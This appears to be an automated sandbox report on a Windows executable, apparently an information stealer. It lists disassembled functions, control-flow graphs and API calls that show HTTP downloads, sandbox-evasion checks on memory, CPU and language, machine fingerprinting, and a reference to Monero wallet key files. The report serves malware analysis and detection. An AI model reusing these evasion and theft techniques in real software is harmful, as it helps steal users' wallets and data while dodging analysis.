                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: HttpQueryInfoA$InternetSetOptionA
                    • API String ID: 2238633743-1775429166
                    • Opcode ID: 6a0022f7389629a3e3cb334dd0a81caeb3a61f57d8c518e0a785e3795a212338
                    • Instruction ID: 9c67e25946a76980476a20c290c763a6dd0b9e35fbd11df36c8798a5e68355e9
                    • Opcode Fuzzy Hash: 6a0022f7389629a3e3cb334dd0a81caeb3a61f57d8c518e0a785e3795a212338
                    • Instruction Fuzzy Hash: EE62FCB5510308AFC348DFAAED8895637F9F74C60171CC53BA605E3268D63B94C9DB62
                    Function 00BC6280 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1033 bc6280-bc630b call bda7a0 call bc47b0 call bda740 InternetOpenA StrCmpCA 1040 bc630d 1033->1040 1041 bc6314-bc6318 1033->1041 1040->1041 1042 bc631e-bc6342 InternetConnectA 1041->1042 1043 bc6509-bc6525 call bda7a0 call bda800 * 2 1041->1043 1044 bc64ff-bc6503 InternetCloseHandle 1042->1044 1045 bc6348-bc634c 1042->1045 1063 bc6528-bc652d 1043->1063 1044->1043 1047 bc634e-bc6358 1045->1047 1048 bc635a 1045->1048 1050 bc6364-bc6392 HttpOpenRequestA 1047->1050 1048->1050 1052 bc6398-bc639c 1050->1052 1053 bc64f5-bc64f9 InternetCloseHandle 1050->1053 1055 bc639e-bc63bf InternetSetOptionA 1052->1055 1056 bc63c5-bc6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1044 1055->1056 1058 bc642c-bc644b call bd8940 1056->1058 1059 bc6407-bc6427 call bda740 call bda800 * 2 1056->1059 1066 bc644d-bc6454 1058->1066 1067 bc64c9-bc64e9 call bda740 call bda800 * 2 1058->1067 1059->1063 1069 bc6456-bc6480 InternetReadFile 1066->1069 1070 bc64c7-bc64ef InternetCloseHandle 1066->1070 1067->1063 1074 bc648b 1069->1074 1075 bc6482-bc6489 1069->1075 1070->1053 1074->1070 1075->1074 1079 bc648d-bc64c5 call bda9b0 call bda8a0 call bda800 1075->1079 1079->1069
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                      • Part of subcall function 00BC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • InternetOpenA.WININET(00BE0DFE,00000001,00000000,00000000,00000000), ref: 00BC62E1
                    • StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC6303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC6335
                    • HttpOpenRequestA.WININET(00000000,GET,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC6385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BC63BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC63D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BC63FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BC646D
                    • InternetCloseHandle.WININET(00000000), ref: 00BC64EF
                    • InternetCloseHandle.WININET(00000000), ref: 00BC64F9
                    • InternetCloseHandle.WININET(00000000), ref: 00BC6503
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET$de-DE
                    • API String ID: 3749127164-1008115567
                    • Opcode ID: efb1fa22fce547352d5855794314656ed4c11552c7f29e2dc3c2045a4b763fed
                    • Instruction ID: 48cdf550996a7167fa95db8397e5bd08c2985dc7477b020588c0a89e6fa1ae02
                    • Opcode Fuzzy Hash: efb1fa22fce547352d5855794314656ed4c11552c7f29e2dc3c2045a4b763fed
                    • Instruction Fuzzy Hash: 11713F71A00358AFDB14DB94DC49FEEB7B8FB44700F1081A9F5096B290EBB56A89CF51
                    Function 00BD5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1090 bd5510-bd5577 call bd5ad0 call bda820 * 3 call bda740 * 4 1106 bd557c-bd5583 1090->1106 1107 bd5585-bd55b6 call bda820 call bda7a0 call bc1590 call bd51f0 1106->1107 1108 bd55d7-bd564c call bda740 * 2 call bc1590 call bd52c0 call bda8a0 call bda800 call bdaad0 StrCmpCA 1106->1108 1124 bd55bb-bd55d2 call bda8a0 call bda800 1107->1124 1134 bd5693-bd56a9 call bdaad0 StrCmpCA 1108->1134 1138 bd564e-bd568e call bda7a0 call bc1590 call bd51f0 call bda8a0 call bda800 1108->1138 1124->1134 1139 bd57dc-bd5844 call bda8a0 call bda820 * 2 call bc1670 call bda800 * 4 call bd6560 call bc1550 1134->1139 1140 bd56af-bd56b6 1134->1140 1138->1134 1270 bd5ac3-bd5ac6 1139->1270 1143 bd56bc-bd56c3 1140->1143 1144 bd57da-bd585f call bdaad0 StrCmpCA 1140->1144 1148 bd571e-bd5793 call bda740 * 2 call bc1590 call bd52c0 call bda8a0 call bda800 call bdaad0 StrCmpCA 1143->1148 1149 bd56c5-bd5719 call bda820 call bda7a0 call bc1590 call bd51f0 call bda8a0 call bda800 1143->1149 1163 bd5865-bd586c 1144->1163 1164 bd5991-bd59f9 call bda8a0 call bda820 * 2 call bc1670 call bda800 * 4 call bd6560 call bc1550 1144->1164 1148->1144 1249 bd5795-bd57d5 call bda7a0 call bc1590 call bd51f0 call bda8a0 call bda800 1148->1249 1149->1144 1170 bd598f-bd5a14 call bdaad0 StrCmpCA 1163->1170 1171 bd5872-bd5879 1163->1171 1164->1270 1200 bd5a28-bd5a91 call bda8a0 call bda820 * 2 call bc1670 call bda800 * 4 call bd6560 call bc1550 1170->1200 1201 bd5a16-bd5a21 Sleep 1170->1201 1179 bd587b-bd58ce call bda820 call bda7a0 call bc1590 call bd51f0 call bda8a0 call bda800 1171->1179 1180 bd58d3-bd5948 call bda740 * 2 call bc1590 call bd52c0 call bda8a0 call bda800 call bdaad0 StrCmpCA 1171->1180 1179->1170 1180->1170 1275 bd594a-bd598a call bda7a0 call bc1590 call bd51f0 call bda8a0 call bda800 1180->1275 1200->1270 1201->1106 1249->1144 1275->1170
                    APIs
                      • Part of subcall function 00BDA820: lstrlen.KERNEL32(00BC4F05,?,?,00BC4F05,00BE0DDE), ref: 00BDA82B
                      • Part of subcall function 00BDA820: lstrcpy.KERNEL32(00BE0DDE,00000000), ref: 00BDA885
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD5644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD56A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD5857
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BD51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD5228
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD5318
                      • Part of subcall function 00BD52C0: lstrlen.KERNEL32(00000000), ref: 00BD532F
                      • Part of subcall function 00BD52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00BD5364
                      • Part of subcall function 00BD52C0: lstrlen.KERNEL32(00000000), ref: 00BD5383
                      • Part of subcall function 00BD52C0: lstrlen.KERNEL32(00000000), ref: 00BD53AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD5940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD5A0C
                    • Sleep.KERNEL32(0000EA60), ref: 00BD5A1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: 612c21bd0bd3bc2f2ff890c1daeecafab0643c9f92a6cf5f64b5ac3840feeaeb
                    • Instruction ID: ace1223a532751a4c482c77e02016f87aa3cc2a8cb07be35cf8e57572fabc7e0
                    • Opcode Fuzzy Hash: 612c21bd0bd3bc2f2ff890c1daeecafab0643c9f92a6cf5f64b5ac3840feeaeb
                    • Instruction Fuzzy Hash: 87E144719102089ACB14FBA0DC96EEDB3BCAF54300F5085AAB40676291FF356F4DDB92
                    Function 00BD17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1301 bd17a0-bd17cd call bdaad0 StrCmpCA 1304 bd17cf-bd17d1 ExitProcess 1301->1304 1305 bd17d7-bd17f1 call bdaad0 1301->1305 1309 bd17f4-bd17f8 1305->1309 1310 bd17fe-bd1811 1309->1310 1311 bd19c2-bd19cd call bda800 1309->1311 1313 bd199e-bd19bd 1310->1313 1314 bd1817-bd181a 1310->1314 1313->1309 1316 bd185d-bd186e StrCmpCA 1314->1316 1317 bd187f-bd1890 StrCmpCA 1314->1317 1318 bd1835-bd1844 call bda820 1314->1318 1319 bd18f1-bd1902 StrCmpCA 1314->1319 1320 bd1951-bd1962 StrCmpCA 1314->1320 1321 bd1970-bd1981 StrCmpCA 1314->1321 1322 bd1913-bd1924 StrCmpCA 1314->1322 1323 bd1932-bd1943 StrCmpCA 1314->1323 1324 bd18ad-bd18be StrCmpCA 1314->1324 1325 bd18cf-bd18e0 StrCmpCA 1314->1325 1326 bd198f-bd1999 call bda820 1314->1326 1327 bd1849-bd1858 call bda820 1314->1327 1328 bd1821-bd1830 call bda820 1314->1328 1342 bd187a 1316->1342 1343 bd1870-bd1873 1316->1343 1344 bd189e-bd18a1 1317->1344 1345 bd1892-bd189c 1317->1345 1318->1313 1350 bd190e 1319->1350 1351 bd1904-bd1907 1319->1351 1333 bd196e 1320->1333 1334 bd1964-bd1967 1320->1334 1336 bd198d 1321->1336 1337 bd1983-bd1986 1321->1337 1329 bd1926-bd1929 1322->1329 1330 bd1930 1322->1330 1331 bd194f 1323->1331 1332 bd1945-bd1948 1323->1332 1346 bd18ca 1324->1346 1347 bd18c0-bd18c3 1324->1347 1348 bd18ec 1325->1348 1349 bd18e2-bd18e5 1325->1349 1326->1313 1327->1313 1328->1313 1329->1330 1330->1313 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 bd18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00BD17C5
                    • ExitProcess.KERNEL32 ref: 00BD17D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: ff91eb2e3caf5ba201701a46f00bc9055dc166c81f0c4d8de0f28f58b8272ab5
                    • Instruction ID: 1848d4d1f34c8dd72e7a0a3fc54fd9400c0f53525b02d2446f845a1ce13d1bcb
                    • Opcode Fuzzy Hash: ff91eb2e3caf5ba201701a46f00bc9055dc166c81f0c4d8de0f28f58b8272ab5
                    • Instruction Fuzzy Hash: E0518FB4A10209FFCB04DFA5D8A4ABEB7F5EF44304F14849AE80567350E775EA42DB62
                    Function 00BD7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1356 bd7500-bd754a GetWindowsDirectoryA 1357 bd754c 1356->1357 1358 bd7553-bd75c7 GetVolumeInformationA call bd8d00 * 3 1356->1358 1357->1358 1365 bd75d8-bd75df 1358->1365 1366 bd75fc-bd7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 bd75e1-bd75fa call bd8d00 1365->1367 1369 bd7619-bd7626 call bda740 1366->1369 1370 bd7628-bd7658 wsprintfA call bda740 1366->1370 1367->1365 1377 bd767e-bd768e 1369->1377 1370->1377
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BD7542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BD757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD760A
                    • wsprintfA.USER32 ref: 00BD7640
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\
                    • API String ID: 1544550907-3809124531
                    • Opcode ID: 6d447860036b947c3ecc40f606b1c29822d717e12cfedde4886db18026ad2665
                    • Instruction ID: 1f57354b5769310e4590f422fecb0c0840d3e1146b44ad65db6a0fade9fefb78
                    • Opcode Fuzzy Hash: 6d447860036b947c3ecc40f606b1c29822d717e12cfedde4886db18026ad2665
                    • Instruction Fuzzy Hash: 2E41B6B1D44348ABDB10DF94DC45BDEB7B8EF18704F1440A9F50577280EB756A84CBA1
                    Function 00BD69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2368), ref: 00BD98A1
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C24D0), ref: 00BD98BA
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2338), ref: 00BD98D2
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2500), ref: 00BD98EA
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C23E0), ref: 00BD9903
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C8FB8), ref: 00BD991B
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013B5DF0), ref: 00BD9933
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013B5BD0), ref: 00BD994C
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2308), ref: 00BD9964
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2248), ref: 00BD997C
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2410), ref: 00BD9995
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2278), ref: 00BD99AD
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013B5AF0), ref: 00BD99C5
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C23F8), ref: 00BD99DE
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BC11D0: ExitProcess.KERNEL32 ref: 00BC1211
                      • Part of subcall function 00BC1160: GetSystemInfo.KERNEL32(?), ref: 00BC116A
                      • Part of subcall function 00BC1160: ExitProcess.KERNEL32 ref: 00BC117E
                      • Part of subcall function 00BC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BC112B
                      • Part of subcall function 00BC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BC1132
                      • Part of subcall function 00BC1110: ExitProcess.KERNEL32 ref: 00BC1143
                      • Part of subcall function 00BC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BC123E
                      • Part of subcall function 00BC1220: __aulldiv.LIBCMT ref: 00BC1258
                      • Part of subcall function 00BC1220: __aulldiv.LIBCMT ref: 00BC1266
                      • Part of subcall function 00BC1220: ExitProcess.KERNEL32 ref: 00BC1294
                      • Part of subcall function 00BD6770: GetUserDefaultLangID.KERNEL32 ref: 00BD6774
                      • Part of subcall function 00BC1190: ExitProcess.KERNEL32 ref: 00BC11C6
                      • Part of subcall function 00BD7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BC11B7), ref: 00BD7880
                      • Part of subcall function 00BD7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BD7887
                      • Part of subcall function 00BD7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BD789F
                      • Part of subcall function 00BD78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7910
                      • Part of subcall function 00BD78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BD7917
                      • Part of subcall function 00BD78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BD792F
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013C8F18,?,00BE110C,?,00000000,?,00BE1110,?,00000000,00BE0AEF), ref: 00BD6ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD6AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00BD6AF9
                    • Sleep.KERNEL32(00001770), ref: 00BD6B04
                    • CloseHandle.KERNEL32(?,00000000,?,013C8F18,?,00BE110C,?,00000000,?,00BE1110,?,00000000,00BE0AEF), ref: 00BD6B1A
                    • ExitProcess.KERNEL32 ref: 00BD6B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2525456742-0
                    • Opcode ID: 64fe25b6ed0e246ff31bbf5f91e725c3766d54338bc1f68b040c80d7b5e50fb1
                    • Instruction ID: d946e018b8436e11f1f73ee7fbdc36d69a4ffd0ea6a8e37af26a8f6ff61a6efc
                    • Opcode Fuzzy Hash: 64fe25b6ed0e246ff31bbf5f91e725c3766d54338bc1f68b040c80d7b5e50fb1
                    • Instruction Fuzzy Hash: C9312C70900208AADB04FBE1DC56FEEF7B8AF04300F1445AAF602B6292FF755945D6A6
                    Function 00BC1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1436 bc1220-bc1247 call bd89b0 GlobalMemoryStatusEx 1439 bc1249-bc1271 call bdda00 * 2 1436->1439 1440 bc1273-bc127a 1436->1440 1442 bc1281-bc1285 1439->1442 1440->1442 1444 bc129a-bc129d 1442->1444 1445 bc1287 1442->1445 1446 bc1289-bc1290 1445->1446 1447 bc1292-bc1294 ExitProcess 1445->1447 1446->1444 1446->1447
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BC123E
                    • __aulldiv.LIBCMT ref: 00BC1258
                    • __aulldiv.LIBCMT ref: 00BC1266
                    • ExitProcess.KERNEL32 ref: 00BC1294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
